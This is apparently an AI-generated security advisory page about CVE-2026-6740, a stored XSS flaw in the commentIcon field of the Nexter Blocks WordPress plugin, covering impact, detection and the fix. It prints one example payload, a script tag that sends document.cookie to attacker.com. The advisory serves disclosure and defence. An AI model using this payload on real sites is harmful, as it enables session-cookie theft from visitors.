
PEACH
Un cadre d’isolation des locataires
CVE-2026-6740 is a Stored Cross-Site Scripting (XSS) vulnerability in the Nexter Blocks – Gutenberg Blocks, Page Builder & AI Website Builder plugin for WordPress. It affects all versions up to and including 4.7.4, caused by insufficient input sanitization and output escaping of the commentIcon parameter. Authenticated attackers with contributor-level access or above can inject arbitrary web scripts into pages that execute in the browsers of any user visiting the affected page. It was published on July 8, 2026, with a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-site Scripting). The root cause is insufficient sanitization of the commentIcon parameter in the plugin's tp-post-meta block handler (classes/blocks/tp-post-meta/index.php), where user-supplied input is stored and later rendered without proper escaping. An authenticated contributor can craft a malicious payload in the commentIcon field that is persisted to the database and subsequently executed in the browser of any visitor loading the affected page. The attack vector is network-based, requires low privileges (contributor role), and no user interaction beyond page visitation (GitHub Advisory, Wordfence).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of any user's browser session when they visit an injected page. This can result in session cookie theft, credential harvesting, user redirection to malicious sites, page content defacement, or performing unauthorized actions on behalf of victims. While availability is not directly impacted, the confidentiality and integrity of user sessions and site content are at risk across all visitors to affected pages (GitHub Advisory, Wordfence).
commentIcon parameter field, insert a crafted XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent SVG/event-handler-based payload.<script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded payloads within the commentIcon field of Post Meta blocks./wp-admin/post.php or REST API endpoints (/wp-json/wp/v2/posts) from contributor-level accounts containing suspicious script content in block attributes.Update the Nexter Blocks plugin to a version above 4.7.4, which includes the fix applied in changeset 3512686 to classes/blocks/tp-post-meta/index.php (GitHub Advisory). As an interim measure, restrict contributor-level and above access to only fully trusted users, and consider disabling the plugin if it is not actively required. Site administrators should also audit existing pages using the Post Meta block for signs of injected malicious scripts (Wordfence).
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."